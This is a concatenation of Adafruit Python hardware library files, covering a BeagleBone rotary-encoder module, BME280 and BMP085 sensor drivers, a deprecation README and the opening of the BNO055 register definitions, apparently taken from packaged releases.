and platform.node() == 'beaglebone':
raise ImportError(
'The Encoder module requires Linux kernel version >= 4.4.x.\n'
'Please upgrade your kernel to use this module.\n'
'Your Linux kernel version is {}.'.format(platform.release()))
eQEP0 = 0
'''eQEP0 channel identifier, pin A-- P9.92, pin B-- P9.27 on Beaglebone
Black.'''
eQEP1 = 1
'''eQEP1 channel identifier, pin A-- P9.35, pin B-- P9.33 on Beaglebone
Black.'''
eQEP2 = 2
'''eQEP2 channel identifier, pin A-- P8.12, pin B-- P8.11 on Beaglebone Black.
Note that there is only one eQEP2 module. This is one alternative set of pins
where it is exposed, which is mutually-exclusive with eQEP2b'''
eQEP2b = 3
'''eQEP2(b) channel identifier, pin A-- P8.41, pin B-- P8.42 on Beaglebone
Black. Note that there is only one eQEP2 module. This is one alternative set of
pins where it is exposed, which is mutually-exclusive with eQEP2'''
# Definitions to initialize the eQEP modules
_OCP_PATH = "/sys/devices/platform/ocp"
_eQEP_DEFS = [
{'channel': 'eQEP0', 'pin_A': 'P9_92', 'pin_B': 'P9_27',
'sys_path': os.path.join(_OCP_PATH, '48300000.epwmss/48300180.eqep')},
{'channel': 'eQEP1', 'pin_A': 'P8_35', 'pin_B': 'P8_33',
'sys_path': os.path.join(_OCP_PATH, '48302000.epwmss/48302180.eqep')},
{'channel': 'eQEP2', 'pin_A': 'P8_12', 'pin_B': 'P8_11',
'sys_path': os.path.join(_OCP_PATH, '48304000.epwmss/48304180.eqep')},
{'channel': 'eQEP2b', 'pin_A': 'P8_41', 'pin_B': 'P8_42',
'sys_path': os.path.join(_OCP_PATH, '48304000.epwmss/48304180.eqep')}
]
class _eQEP(object):
'''Enhanced Quadrature Encoder Pulse (eQEP) module class. Abstraction
for either of the three available channels (eQEP0, eQEP1, eQEP2) on
the Beaglebone'''
@classmethod
def fromdict(cls, d):
'''Creates a class instance from a dictionary'''
allowed = ('channel', 'pin_A', 'pin_B', 'sys_path')
df = {k: v for k, v in d.items() if k in allowed}
return cls(**df)
def __init__(self, channel, pin_A, pin_B, sys_path):
'''Initialize the given eQEP channel
Attributes:
channel (str): eQEP channel name. E.g. "eQEP0", "eQEP1", etc.
Note that "eQEP2" and "eQEP2b" are channel aliases for the
same module, but on different (mutually-exclusive) sets of
pins
pin_A (str): physical input pin for the A signal of the
rotary encoder
pin_B (str): physical input pin for the B signal of the
rotary encoder
sys_path (str): sys filesystem path to access the attributes
of this eQEP module
node (str): sys filesystem device node that contains the
readable or writable attributes to control the QEP channel
'''
self.channel = channel
self.pin_A = pin_A
self.pin_B = pin_B
self.sys_path = sys_path
self.node = Node(sys_path)
class RotaryEncoder(object):
'''
Rotary encoder class abstraction to control a given QEP channel.
Args:
eqep_num (int): determines which eQEP pins are set up.
Allowed values: EQEP0, EQEP1, EQEP2 or EQEP2b,
based on which pins the physical rotary encoder
is connected to.
'''
def _run_cmd(self, cmd):
'''Runs a command. If not successful (i.e. error code different than
zero), print the stderr output as a warning.
'''
try:
output = check_output(cmd, stderr=STDOUT)
self._logger.info(
"_run_cmd(): cmd='{}' return code={} output={}".format(
" ".join(cmd), 0, output))
except CalledProcessError as e:
self._logger.warning(
"_run_cmd(): cmd='{}' return code={} output={}".format(
" ".join(cmd), e.returncode, e.output))
def _config_pin(self, pin):
'''Configures a pin in QEP mode using the `config-pin` binary'''
self._run_cmd(["config-pin", pin, "qep"])
def __init__(self, eqep_num):
'''Creates an instance of the class RotaryEncoder.'''
# nanoseconds factor to convert period to frequency and back
self._NS_FACTOR = 1000000000
# Set up logging at the module level
self._logger = logging.getLogger(__name__)
self._logger.addHandler(logging.NullHandler())
# Initialize the eQEP channel structures
self._eqep = _eQEP.fromdict(_eQEP_DEFS[eqep_num])
self._logger.info(
"Configuring: {}, pin A: {}, pin B: {}, sys path: {}".format(
self._eqep.channel, self._eqep.pin_A, self._eqep.pin_B,
self._eqep.sys_path))
# Configure the pins for the given channel
self._config_pin(self._eqep.pin_A)
self._config_pin(self._eqep.pin_B)
self._logger.debug(
"RotaryEncoder(): sys node: {0}".format(self._eqep.sys_path))
# Enable the channel upon initialization
self.enable()
@property
def enabled(self):
'''Returns the enabled status of the module:
Returns:
bool: True if the eQEP channel is enabled, False otherwise.
'''
isEnabled = bool(int(self._eqep.node.enabled))
return isEnabled
def _setEnable(self, enabled):
'''Turns the eQEP hardware ON or OFF
Args:
enabled (int): enable the module with 1, disable it with 0.
Raises:
ValueError: if the value for enabled is < 0 or > 1
'''
enabled = int(enabled)
if enabled < 0 or enabled > 1:
raise ValueError(
'The "enabled" attribute can only be set to 0 or 1. '
'You attempted to set it to {}.'.format(enabled))
self._eqep.node.enabled = str(enabled)
self._logger.info("Channel: {}, enabled: {}".format(
self._eqep.channel, self._eqep.node.enabled))
def enable(self):
'''Turns the eQEP hardware ON'''
self._setEnable(1)
def disable(self):
'''Turns the eQEP hardware OFF'''
self._setEnable(0)
@property
def mode(self):
'''Returns the mode the eQEP hardware is in.
Returns:
int: 0 if the eQEP channel is configured in absolute mode,
1 if configured in relative mode.
'''
mode = int(self._eqep.node.mode)
if mode == 0:
mode_name = "absolute"
elif mode == 1:
mode_name = "relative"
else:
mode_name = "invalid"
self._logger.debug("getMode(): Channel {}, mode: {} ({})".format(
self._eqep.channel, mode, mode_name))
return mode
@mode.setter
def mode(self, mode):
'''Sets the eQEP mode as absolute (0) or relative (1).
See the setAbsolute() and setRelative() methods for
more information.
'''
mode = int(mode)
if mode < 0 or mode > 1:
raise ValueError(
'The "mode" attribute can only be set to 0 or 1. '
'You attempted to set it to {}.'.format(mode))
self._eqep.node.mode = str(mode)
self._logger.debug("Mode set to: {}".format(
self._eqep.node.mode))
def setAbsolute(self):
'''Sets the eQEP mode as Absolute:
The position starts at zero and is incremented or
decremented by the encoder's movement
'''
self.mode = 0
def setRelative(self):
'''Sets the eQEP mode as Relative:
The position is reset when the unit timer overflows.
'''
self.mode = 1
@property
def position(self):
'''Returns the current position of the encoder.
In absolute mode, this attribute represents the current position
of the encoder.
In relative mode, this attribute represents the position of the
encoder at the last unit timer overflow.
'''
position = self._eqep.node.position
self._logger.debug("Get position: Channel {}, position: {}".format(
self._eqep.channel, position))
return int(position)
@position.setter
def position(self, position):
'''Sets the current position to a new value'''
position = int(position)
self._eqep.node.position = str(position)
self._logger.debug("Set position: Channel {}, position: {}".format(
self._eqep.channel, position))
@property
def frequency(self):
'''Sets the frequency in Hz at which the driver reports
new positions.
'''
frequency = self._NS_FACTOR / int(self._eqep.node.period)
self._logger.debug(
"Set frequency(): Channel {}, frequency: {} Hz, "
"period: {} ns".format(
self._eqep.channel, frequency,
self._eqep.node.period))
return frequency
@frequency.setter
def frequency(self, frequency):
'''Sets the frequency in Hz at which the driver reports
new positions.
'''
# github issue #299: force period to be an integer
period = int(self._NS_FACTOR / frequency) # Period in nanoseconds
self._eqep.node.period = str(period)
self._logger.debug(
"Set frequency(): Channel {}, frequency: {} Hz, "
"period: {} ns".format(
self._eqep.channel, frequency, period))
def zero(self):
'''Resets the current position to 0'''
self.position = 0 | Adafruit-BBIO | /Adafruit_BBIO-1.2.0.tar.gz/Adafruit_BBIO-1.2.0/Adafruit_BBIO/Encoder.py | Encoder.py |
import logging
import time
# BME280 default address.
BME280_I2CADDR = 0x77
# Operating Modes
BME280_OSAMPLE_1 = 1
BME280_OSAMPLE_2 = 2
BME280_OSAMPLE_4 = 3
BME280_OSAMPLE_8 = 4
BME280_OSAMPLE_16 = 5
# Standby Settings
BME280_STANDBY_0p5 = 0
BME280_STANDBY_62p5 = 1
BME280_STANDBY_125 = 2
BME280_STANDBY_250 = 3
BME280_STANDBY_500 = 4
BME280_STANDBY_1000 = 5
BME280_STANDBY_10 = 6
BME280_STANDBY_20 = 7
# Filter Settings
BME280_FILTER_off = 0
BME280_FILTER_2 = 1
BME280_FILTER_4 = 2
BME280_FILTER_8 = 3
BME280_FILTER_16 = 4
# BME280 Registers
BME280_REGISTER_DIG_T1 = 0x88 # Trimming parameter registers
BME280_REGISTER_DIG_T2 = 0x8A
BME280_REGISTER_DIG_T3 = 0x8C
BME280_REGISTER_DIG_P1 = 0x8E
BME280_REGISTER_DIG_P2 = 0x90
BME280_REGISTER_DIG_P3 = 0x92
BME280_REGISTER_DIG_P4 = 0x94
BME280_REGISTER_DIG_P5 = 0x96
BME280_REGISTER_DIG_P6 = 0x98
BME280_REGISTER_DIG_P7 = 0x9A
BME280_REGISTER_DIG_P8 = 0x9C
BME280_REGISTER_DIG_P9 = 0x9E
BME280_REGISTER_DIG_H1 = 0xA1
BME280_REGISTER_DIG_H2 = 0xE1
BME280_REGISTER_DIG_H3 = 0xE3
BME280_REGISTER_DIG_H4 = 0xE4
BME280_REGISTER_DIG_H5 = 0xE5
BME280_REGISTER_DIG_H6 = 0xE6
BME280_REGISTER_DIG_H7 = 0xE7
BME280_REGISTER_CHIPID = 0xD0
BME280_REGISTER_VERSION = 0xD1
BME280_REGISTER_SOFTRESET = 0xE0
BME280_REGISTER_STATUS = 0xF3
BME280_REGISTER_CONTROL_HUM = 0xF2
BME280_REGISTER_CONTROL = 0xF4
BME280_REGISTER_CONFIG = 0xF5
BME280_REGISTER_DATA = 0xF7
class BME280(object):
def __init__(self, t_mode=BME280_OSAMPLE_1, p_mode=BME280_OSAMPLE_1, h_mode=BME280_OSAMPLE_1,
standby=BME280_STANDBY_250, filter=BME280_FILTER_off, address=BME280_I2CADDR, i2c=None,
**kwargs):
self._logger = logging.getLogger('Adafruit_BMP.BMP085')
# Check that t_mode is valid.
if t_mode not in [BME280_OSAMPLE_1, BME280_OSAMPLE_2, BME280_OSAMPLE_4,
BME280_OSAMPLE_8, BME280_OSAMPLE_16]:
raise ValueError(
'Unexpected t_mode value {0}.'.format(t_mode))
self._t_mode = t_mode
# Check that p_mode is valid.
if p_mode not in [BME280_OSAMPLE_1, BME280_OSAMPLE_2, BME280_OSAMPLE_4,
BME280_OSAMPLE_8, BME280_OSAMPLE_16]:
raise ValueError(
'Unexpected p_mode value {0}.'.format(p_mode))
self._p_mode = p_mode
# Check that h_mode is valid.
if h_mode not in [BME280_OSAMPLE_1, BME280_OSAMPLE_2, BME280_OSAMPLE_4,
BME280_OSAMPLE_8, BME280_OSAMPLE_16]:
raise ValueError(
'Unexpected h_mode value {0}.'.format(h_mode))
self._h_mode = h_mode
# Check that standby is valid.
if standby not in [BME280_STANDBY_0p5, BME280_STANDBY_62p5, BME280_STANDBY_125, BME280_STANDBY_250,
BME280_STANDBY_500, BME280_STANDBY_1000, BME280_STANDBY_10, BME280_STANDBY_20]:
raise ValueError(
'Unexpected standby value {0}.'.format(standby))
self._standby = standby
# Check that filter is valid.
if filter not in [BME280_FILTER_off, BME280_FILTER_2, BME280_FILTER_4, BME280_FILTER_8, BME280_FILTER_16]:
raise ValueError(
'Unexpected filter value {0}.'.format(filter))
self._filter = filter
# Create I2C device.
if i2c is None:
import Adafruit_GPIO.I2C as I2C
i2c = I2C
# Create device, catch permission errors
try:
self._device = i2c.get_i2c_device(address, **kwargs)
except IOError:
print("Unable to communicate with sensor, check permissions.")
exit()
# Load calibration values.
self._load_calibration()
self._device.write8(BME280_REGISTER_CONTROL, 0x24) # Sleep mode
time.sleep(0.002)
self._device.write8(BME280_REGISTER_CONFIG, ((standby << 5) | (filter << 2)))
time.sleep(0.002)
self._device.write8(BME280_REGISTER_CONTROL_HUM, h_mode) # Set Humidity Oversample
self._device.write8(BME280_REGISTER_CONTROL, ((t_mode << 5) | (p_mode << 2) | 3)) # Set Temp/Pressure Oversample and enter Normal mode
self.t_fine = 0.0
def _load_calibration(self):
self.dig_T1 = self._device.readU16LE(BME280_REGISTER_DIG_T1)
self.dig_T2 = self._device.readS16LE(BME280_REGISTER_DIG_T2)
self.dig_T3 = self._device.readS16LE(BME280_REGISTER_DIG_T3)
self.dig_P1 = self._device.readU16LE(BME280_REGISTER_DIG_P1)
self.dig_P2 = self._device.readS16LE(BME280_REGISTER_DIG_P2)
self.dig_P3 = self._device.readS16LE(BME280_REGISTER_DIG_P3)
self.dig_P4 = self._device.readS16LE(BME280_REGISTER_DIG_P4)
self.dig_P5 = self._device.readS16LE(BME280_REGISTER_DIG_P5)
self.dig_P6 = self._device.readS16LE(BME280_REGISTER_DIG_P6)
self.dig_P7 = self._device.readS16LE(BME280_REGISTER_DIG_P7)
self.dig_P8 = self._device.readS16LE(BME280_REGISTER_DIG_P8)
self.dig_P9 = self._device.readS16LE(BME280_REGISTER_DIG_P9)
self.dig_H1 = self._device.readU8(BME280_REGISTER_DIG_H1)
self.dig_H2 = self._device.readS16LE(BME280_REGISTER_DIG_H2)
self.dig_H3 = self._device.readU8(BME280_REGISTER_DIG_H3)
self.dig_H6 = self._device.readS8(BME280_REGISTER_DIG_H7)
h4 = self._device.readS8(BME280_REGISTER_DIG_H4)
h4 = (h4 << 4)
self.dig_H4 = h4 | (self._device.readU8(BME280_REGISTER_DIG_H5) & 0x0F)
h5 = self._device.readS8(BME280_REGISTER_DIG_H6)
h5 = (h5 << 4)
self.dig_H5 = h5 | (
self._device.readU8(BME280_REGISTER_DIG_H5) >> 4 & 0x0F)
'''
print '0xE4 = {0:2x}'.format (self._device.readU8 (BME280_REGISTER_DIG_H4))
print '0xE5 = {0:2x}'.format (self._device.readU8 (BME280_REGISTER_DIG_H5))
print '0xE6 = {0:2x}'.format (self._device.readU8 (BME280_REGISTER_DIG_H6))
print 'dig_H1 = {0:d}'.format (self.dig_H1)
print 'dig_H2 = {0:d}'.format (self.dig_H2)
print 'dig_H3 = {0:d}'.format (self.dig_H3)
print 'dig_H4 = {0:d}'.format (self.dig_H4)
print 'dig_H5 = {0:d}'.format (self.dig_H5)
print 'dig_H6 = {0:d}'.format (self.dig_H6)
'''
def read_raw_temp(self):
"""Waits for reading to become available on device."""
"""Does a single burst read of all data values from device."""
"""Returns the raw (uncompensated) temperature from the sensor."""
while (self._device.readU8(BME280_REGISTER_STATUS) & 0x08): # Wait for conversion to complete (TODO : add timeout)
time.sleep(0.002)
self.BME280Data = self._device.readList(BME280_REGISTER_DATA, 8)
raw = ((self.BME280Data[3] << 16) | (self.BME280Data[4] << 8) | self.BME280Data[5]) >> 4
return raw
def read_raw_pressure(self):
"""Returns the raw (uncompensated) pressure level from the sensor."""
"""Assumes that the temperature has already been read """
"""i.e. that BME280Data[] has been populated."""
raw = ((self.BME280Data[0] << 16) | (self.BME280Data[1] << 8) | self.BME280Data[2]) >> 4
return raw
def read_raw_humidity(self):
"""Returns the raw (uncompensated) humidity value from the sensor."""
"""Assumes that the temperature has already been read """
"""i.e. that BME280Data[] has been populated."""
raw = (self.BME280Data[6] << 8) | self.BME280Data[7]
return raw
def read_temperature(self):
"""Gets the compensated temperature in degrees celsius."""
# float in Python is double precision
UT = float(self.read_raw_temp())
var1 = (UT / 16384.0 - float(self.dig_T1) / 1024.0) * float(self.dig_T2)
var2 = ((UT / 131072.0 - float(self.dig_T1) / 8192.0) * (
UT / 131072.0 - float(self.dig_T1) / 8192.0)) * float(self.dig_T3)
self.t_fine = int(var1 + var2)
temp = (var1 + var2) / 5120.0
return temp
def read_pressure(self):
"""Gets the compensated pressure in Pascals."""
adc = float(self.read_raw_pressure())
var1 = float(self.t_fine) / 2.0 - 64000.0
var2 = var1 * var1 * float(self.dig_P6) / 32768.0
var2 = var2 + var1 * float(self.dig_P5) * 2.0
var2 = var2 / 4.0 + float(self.dig_P4) * 65536.0
var1 = (
float(self.dig_P3) * var1 * var1 / 524288.0 + float(self.dig_P2) * var1) / 524288.0
var1 = (1.0 + var1 / 32768.0) * float(self.dig_P1)
if var1 == 0:
return 0
p = 1048576.0 - adc
p = ((p - var2 / 4096.0) * 6250.0) / var1
var1 = float(self.dig_P9) * p * p / 2147483648.0
var2 = p * float(self.dig_P8) / 32768.0
p = p + (var1 + var2 + float(self.dig_P7)) / 16.0
return p
def read_humidity(self):
adc = float(self.read_raw_humidity())
# print 'Raw humidity = {0:d}'.format (adc)
h = float(self.t_fine) - 76800.0
h = (adc - (float(self.dig_H4) * 64.0 + float(self.dig_H5) / 16384.0 * h)) * (
float(self.dig_H2) / 65536.0 * (1.0 + float(self.dig_H6) / 67108864.0 * h * (
1.0 + float(self.dig_H3) / 67108864.0 * h)))
h = h * (1.0 - float(self.dig_H1) * h / 524288.0)
if h > 100:
h = 100
elif h < 0:
h = 0
return h
def read_temperature_f(self):
# Wrapper to get temp in F
celsius = self.read_temperature()
temp = celsius * 1.8 + 32
return temp
def read_pressure_inches(self):
# Wrapper to get pressure in inches of Hg
pascals = self.read_pressure()
inches = pascals * 0.0002953
return inches
def read_dewpoint(self):
# Return calculated dewpoint in C, only accurate at > 50% RH
celsius = self.read_temperature()
humidity = self.read_humidity()
dewpoint = celsius - ((100 - humidity) / 5)
return dewpoint
def read_dewpoint_f(self):
# Return calculated dewpoint in F, only accurate at > 50% RH
dewpoint_c = self.read_dewpoint()
dewpoint_f = dewpoint_c * 1.8 + 32
return dewpoint_f | Adafruit-BME280 | /Adafruit_BME280-1.0.1-py3-none-any.whl/Adafruit_BME280/BME280.py | BME280.py |
DEPRECATED LIBRARY Adafruit Python BMP
===================
This library has been deprecated!
the bmp085 and bmp180 are no longer made, and are replaced by the bmp280 + friends
we are now only using our circuitpython sensor libraries in python
we are leaving the code up for historical/research purposes but archiving the repository.
check out this guide for using the bmp280 with python!
https://learn.adafruit.com/adafruit-bmp280-barometric-pressure-plus-temperature-sensor-breakout
Adafruit Python BMP
------------------------
Python library for accessing the BMP series pressure and temperature sensors like the BMP085/BMP180 on a Raspberry Pi or Beaglebone Black.
Designed specifically to work with the Adafruit BMP085/BMP180 pressure sensors ----> https://www.adafruit.com/products/1603
To install, download the library by clicking the download zip link to the right and unzip the archive somewhere on your Raspberry Pi or Beaglebone Black. Then execute the following command in the directory of the library:~~
````
sudo python setup.py install
````
Make sure you have internet access on the device so it can download the required dependencies.
See examples of usage in the examples folder.
Adafruit invests time and resources providing this open source code, please support Adafruit and open-source hardware by purchasing products from Adafruit!
Written by Tony DiCola for Adafruit Industries.
MIT license, all text above must be included in any redistribution
| Adafruit-BMP | /Adafruit_BMP-1.5.4.tar.gz/Adafruit_BMP-1.5.4/README.md | README.md |
from __future__ import division
import logging
import time
# BMP085 default address.
BMP085_I2CADDR = 0x77
# Operating Modes
BMP085_ULTRALOWPOWER = 0
BMP085_STANDARD = 1
BMP085_HIGHRES = 2
BMP085_ULTRAHIGHRES = 3
# BMP085 Registers
BMP085_CAL_AC1 = 0xAA # R Calibration data (16 bits)
BMP085_CAL_AC2 = 0xAC # R Calibration data (16 bits)
BMP085_CAL_AC3 = 0xAE # R Calibration data (16 bits)
BMP085_CAL_AC4 = 0xB0 # R Calibration data (16 bits)
BMP085_CAL_AC5 = 0xB2 # R Calibration data (16 bits)
BMP085_CAL_AC6 = 0xB4 # R Calibration data (16 bits)
BMP085_CAL_B1 = 0xB6 # R Calibration data (16 bits)
BMP085_CAL_B2 = 0xB8 # R Calibration data (16 bits)
BMP085_CAL_MB = 0xBA # R Calibration data (16 bits)
BMP085_CAL_MC = 0xBC # R Calibration data (16 bits)
BMP085_CAL_MD = 0xBE # R Calibration data (16 bits)
BMP085_CONTROL = 0xF4
BMP085_TEMPDATA = 0xF6
BMP085_PRESSUREDATA = 0xF6
# Commands
BMP085_READTEMPCMD = 0x2E
BMP085_READPRESSURECMD = 0x34
class BMP085(object):
def __init__(self, mode=BMP085_STANDARD, address=BMP085_I2CADDR, i2c=None, **kwargs):
self._logger = logging.getLogger('Adafruit_BMP.BMP085')
# Check that mode is valid.
if mode not in [BMP085_ULTRALOWPOWER, BMP085_STANDARD, BMP085_HIGHRES, BMP085_ULTRAHIGHRES]:
raise ValueError('Unexpected mode value {0}. Set mode to one of BMP085_ULTRALOWPOWER, BMP085_STANDARD, BMP085_HIGHRES, or BMP085_ULTRAHIGHRES'.format(mode))
self._mode = mode
# Create I2C device.
if i2c is None:
import Adafruit_GPIO.I2C as I2C
i2c = I2C
self._device = i2c.get_i2c_device(address, **kwargs)
# Load calibration values.
self._load_calibration()
def _load_calibration(self):
self.cal_AC1 = self._device.readS16BE(BMP085_CAL_AC1) # INT16
self.cal_AC2 = self._device.readS16BE(BMP085_CAL_AC2) # INT16
self.cal_AC3 = self._device.readS16BE(BMP085_CAL_AC3) # INT16
self.cal_AC4 = self._device.readU16BE(BMP085_CAL_AC4) # UINT16
self.cal_AC5 = self._device.readU16BE(BMP085_CAL_AC5) # UINT16
self.cal_AC6 = self._device.readU16BE(BMP085_CAL_AC6) # UINT16
self.cal_B1 = self._device.readS16BE(BMP085_CAL_B1) # INT16
self.cal_B2 = self._device.readS16BE(BMP085_CAL_B2) # INT16
self.cal_MB = self._device.readS16BE(BMP085_CAL_MB) # INT16
self.cal_MC = self._device.readS16BE(BMP085_CAL_MC) # INT16
self.cal_MD = self._device.readS16BE(BMP085_CAL_MD) # INT16
self._logger.debug('AC1 = {0:6d}'.format(self.cal_AC1))
self._logger.debug('AC2 = {0:6d}'.format(self.cal_AC2))
self._logger.debug('AC3 = {0:6d}'.format(self.cal_AC3))
self._logger.debug('AC4 = {0:6d}'.format(self.cal_AC4))
self._logger.debug('AC5 = {0:6d}'.format(self.cal_AC5))
self._logger.debug('AC6 = {0:6d}'.format(self.cal_AC6))
self._logger.debug('B1 = {0:6d}'.format(self.cal_B1))
self._logger.debug('B2 = {0:6d}'.format(self.cal_B2))
self._logger.debug('MB = {0:6d}'.format(self.cal_MB))
self._logger.debug('MC = {0:6d}'.format(self.cal_MC))
self._logger.debug('MD = {0:6d}'.format(self.cal_MD))
def _load_datasheet_calibration(self):
# Set calibration from values in the datasheet example. Useful for debugging the
# temp and pressure calculation accuracy.
self.cal_AC1 = 408
self.cal_AC2 = -72
self.cal_AC3 = -14383
self.cal_AC4 = 32741
self.cal_AC5 = 32757
self.cal_AC6 = 23153
self.cal_B1 = 6190
self.cal_B2 = 4
self.cal_MB = -32767
self.cal_MC = -8711
self.cal_MD = 2868
def read_raw_temp(self):
"""Reads the raw (uncompensated) temperature from the sensor."""
self._device.write8(BMP085_CONTROL, BMP085_READTEMPCMD)
time.sleep(0.005) # Wait 5ms
raw = self._device.readU16BE(BMP085_TEMPDATA)
self._logger.debug('Raw temp 0x{0:X} ({1})'.format(raw & 0xFFFF, raw))
return raw
def read_raw_pressure(self):
"""Reads the raw (uncompensated) pressure level from the sensor."""
self._device.write8(BMP085_CONTROL, BMP085_READPRESSURECMD + (self._mode << 6))
if self._mode == BMP085_ULTRALOWPOWER:
time.sleep(0.005)
elif self._mode == BMP085_HIGHRES:
time.sleep(0.014)
elif self._mode == BMP085_ULTRAHIGHRES:
time.sleep(0.026)
else:
time.sleep(0.008)
msb = self._device.readU8(BMP085_PRESSUREDATA)
lsb = self._device.readU8(BMP085_PRESSUREDATA+1)
xlsb = self._device.readU8(BMP085_PRESSUREDATA+2)
raw = ((msb << 16) + (lsb << 8) + xlsb) >> (8 - self._mode)
self._logger.debug('Raw pressure 0x{0:04X} ({1})'.format(raw & 0xFFFF, raw))
return raw
def read_temperature(self):
"""Gets the compensated temperature in degrees celsius."""
UT = self.read_raw_temp()
# Datasheet value for debugging:
#UT = 27898
# Calculations below are taken straight from section 3.5 of the datasheet.
X1 = ((UT - self.cal_AC6) * self.cal_AC5) >> 15
X2 = (self.cal_MC << 11) // (X1 + self.cal_MD)
B5 = X1 + X2
temp = ((B5 + 8) >> 4) / 10.0
self._logger.debug('Calibrated temperature {0} C'.format(temp))
return temp
def read_pressure(self):
"""Gets the compensated pressure in Pascals."""
UT = self.read_raw_temp()
UP = self.read_raw_pressure()
# Datasheet values for debugging:
#UT = 27898
#UP = 23843
# Calculations below are taken straight from section 3.5 of the datasheet.
# Calculate true temperature coefficient B5.
X1 = ((UT - self.cal_AC6) * self.cal_AC5) >> 15
X2 = (self.cal_MC << 11) // (X1 + self.cal_MD)
B5 = X1 + X2
self._logger.debug('B5 = {0}'.format(B5))
# Pressure Calculations
B6 = B5 - 4000
self._logger.debug('B6 = {0}'.format(B6))
X1 = (self.cal_B2 * (B6 * B6) >> 12) >> 11
X2 = (self.cal_AC2 * B6) >> 11
X3 = X1 + X2
B3 = (((self.cal_AC1 * 4 + X3) << self._mode) + 2) // 4
self._logger.debug('B3 = {0}'.format(B3))
X1 = (self.cal_AC3 * B6) >> 13
X2 = (self.cal_B1 * ((B6 * B6) >> 12)) >> 16
X3 = ((X1 + X2) + 2) >> 2
B4 = (self.cal_AC4 * (X3 + 32768)) >> 15
self._logger.debug('B4 = {0}'.format(B4))
B7 = (UP - B3) * (50000 >> self._mode)
self._logger.debug('B7 = {0}'.format(B7))
if B7 < 0x80000000:
p = (B7 * 2) // B4
else:
p = (B7 // B4) * 2
X1 = (p >> 8) * (p >> 8)
X1 = (X1 * 3038) >> 16
X2 = (-7357 * p) >> 16
p = p + ((X1 + X2 + 3791) >> 4)
self._logger.debug('Pressure {0} Pa'.format(p))
return p
def read_altitude(self, sealevel_pa=101325.0):
"""Calculates the altitude in meters."""
# Calculation taken straight from section 3.6 of the datasheet.
pressure = float(self.read_pressure())
altitude = 44330.0 * (1.0 - pow(pressure / sealevel_pa, (1.0/5.255)))
self._logger.debug('Altitude {0} m'.format(altitude))
return altitude
def read_sealevel_pressure(self, altitude_m=0.0):
"""Calculates the pressure at sealevel when given a known altitude in
meters. Returns a value in Pascals."""
pressure = float(self.read_pressure())
p0 = pressure / pow(1.0 - altitude_m/44330.0, 5.255)
self._logger.debug('Sealevel pressure {0} Pa'.format(p0))
return p0 | Adafruit-BMP | /Adafruit_BMP-1.5.4.tar.gz/Adafruit_BMP-1.5.4/Adafruit_BMP/BMP085.py | BMP085.py |
import binascii
import logging
import struct
import time
import serial
# I2C addresses
BNO055_ADDRESS_A = 0x28
BNO055_ADDRESS_B = 0x29
BNO055_ID = 0xA0
# Page id register definition
BNO055_PAGE_ID_ADDR = 0X07
# PAGE0 REGISTER DEFINITION START
BNO055_CHIP_ID_ADDR = 0x00
BNO055_ACCEL_REV_ID_ADDR = 0x01
BNO055_MAG_REV_ID_ADDR = 0x02
BNO055_GYRO_REV_ID_ADDR = 0x03
BNO055_SW_REV_ID_LSB_ADDR = 0x04
BNO055_SW_REV_ID_MSB_ADDR = 0x05
BNO055_BL_REV_ID_ADDR = 0X06
# Accel data register
BNO055_ACCEL_DATA_X_LSB_ADDR = 0X08
BNO055_ACCEL_DATA_X_MSB_ADDR = 0X09
BNO055_ACCEL_DATA_Y_LSB_ADDR = 0X0A
BNO055_ACCEL_DATA_Y_MSB_ADDR = 0X0B
BNO055_ACCEL_DATA_Z_LSB_ADDR = 0X0C
BNO055_ACCEL_DATA_Z_MSB_ADDR = 0X0D
# Mag data register
BNO055_MAG_DATA_X_LSB_ADDR = 0X0E
BNO055_MAG_DATA_X_MSB_ADDR = 0X0F
BNO055_MAG_DATA_Y_LSB_ADDR = 0X10
BNO055_MAG_DATA_Y_MSB_ADDR = 0X11
BNO055_MAG_DATA_Z_LSB_ADDR = 0X12
BNO055_MAG_DATA_Z_MSB_ADDR = 0X13
# Gyro data registers
BNO055_GYRO_DATA_X_LSB_ADDR = 0X14
BNO055_GYRO_DATA_X_MSB_ADDR = 0X15
BNO055_GYRO_DATA_Y_LSB_ADDR = 0X16
BNO055_GYRO_DATA_Y_MSB_ADDR = 0X17
BNO055_GYRO_DATA_Z_LSB_ADDR = 0X18
BNO055_GYRO_DATA_Z_MSB_ADDR = 0X19
# Euler data registers
BNO055_EULER_H_LSB_ADDR = 0X1A
BNO055_EULER_H_MSB_ADDR = 0X1B
BNO055_EULER_R_LSB_ADDR = 0X1C
BNO055_EULER_R_MSB_ADDR = 0X1D
BNO055_EULER_P_LSB_ADDR = 0X1E
BNO055_EULER_P_MSB_ADDR = 0X1F
# Quaternion data registers
BNO055_QUATERNION_DATA_W_LSB_ADDR = 0X20
BNO055_QUATERNION_DATA_W_MSB_ADDR = 0X21
BNO055_QUATERNION_DATA_X_LSB_ADDR = 0X22
BNO055_QUATERNION_DATA_X_MSB_ADDR = 0X23
BNO055_QUATERNION_DATA_Y_LSB_ADDR = 0X24
BNO055_QUATERNION_DATA_Y_MSB_ADDR = 0X25
BNO055_QUATERNION_DATA_Z_LSB_ADDR = 0X26
BNO055_QUATERNION_DATA_Z_MSB_ADDR = 0X27
# Linear acceleration data registers
BNO055_LINEAR_ACCEL_DATA_X_LSB_ADDR = 0X28
BNO055_LINEAR_ACCEL_DATA_X_MSB_ADDR = 0X29
BNO055_LINEAR_ACCEL_DATA_Y_LSB_ADDR = 0X2A
BNO055_LINEAR_ACCEL_DATA_Y_MSB_ADDR = 0X2B
BNO055_LINEAR_ACCEL_DATA_Z_LSB_ADDR = 0X2C
BNO055_LINEAR_ACCEL_DATA_Z_MSB_ADDR = 0X2D
# Gravity data registers
BNO055_GRAVITY_DATA_X_LSB_ADDR = 0X2E
BNO055_GRAVITY_DATA_X_MSB_ADDR = 0X2F
BNO055_GRAVITY_DATA_Y_LSB_ADDR = 0X30
BNO055_GRAVITY_DATA_Y_MSB_ADDR = 0X31
BNO055_GRAVITY_DATA_Z_LSB_ADDR = 0X32
BNO055_GRAVITY_DATA_Z_MSB_ADDR = 0X33
# Temperature data register
BNO055_TEMP_ADDR = 0X34
# Status registers
BNO055_CALIB_STAT_ADDR = 0X35
BNO055_SELFTEST_RESULT_ADDR = 0X36
BNO055_INTR_STAT_ADDR = 0X37
BNO055_SYS_CLK_STAT_ADDR = 0X38
BNO055_SYS_STAT_ADDR = 0X39
BNO055_SYS_ERR_ADDR = 0X3A
# Unit selection register
BNO055_UNIT_SEL_ADDR = 0X3B
BNO055_DATA_SELECT_ADDR = 0X3C
# Mode registers
BNO055_OPR_MODE_ADDR = 0X3D
